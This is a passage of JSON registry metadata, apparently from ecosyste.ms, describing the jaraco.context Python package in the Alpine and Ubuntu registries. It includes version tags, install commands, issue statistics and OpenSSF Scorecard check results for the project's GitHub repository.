deload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.585Z","dependent_packages_count":1,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.030839073262366,"stargazers_count":30.236380713838447,"forks_count":30.021133375078275,"average":16.572088290544773},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":"bribbers@disroot.org","url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":3041,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-01-31T20:51:34.522Z","updated_at":"2023-01-31T20:51:34.522Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39959,"maintainers_count":905,"namespaces_count":3,"keywords_count":6584,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2944},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-08-24T05:05:51.343Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":13440729,"name":"jaraco.context","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-08T04:38:21.606Z","latest_release_published_at":"2026-02-08T04:38:21.606Z","latest_release_number":"6.0.0-1","last_synced_at":"2026-03-08T04:54:03.264Z","created_at":"2026-02-08T04:38:21.326Z","updated_at":"2026-08-06T19:26:18.593Z","registry_url":"https://launchpad.net/ubuntu/+source/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.7.0","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, pybuild-plugin-pyproject, python3-all, python3-portend \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.593Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/jaraco.context?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1440,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1308},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-08-24T05:05:15.657Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":6197880,"name":"py3-jaraco-context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2021-04-05T18:18:46.000Z","latest_release_published_at":"2021-04-05T18:18:46.000Z","latest_release_number":"4.0.0-r1","last_synced_at":"2026-03-20T07:02:03.126Z","created_at":"2023-02-01T01:53:07.490Z","updated_at":"2026-08-06T19:26:18.600Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.14/community/x86_64/py3-jaraco-context","install_command":"apk add py3-jaraco-context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, 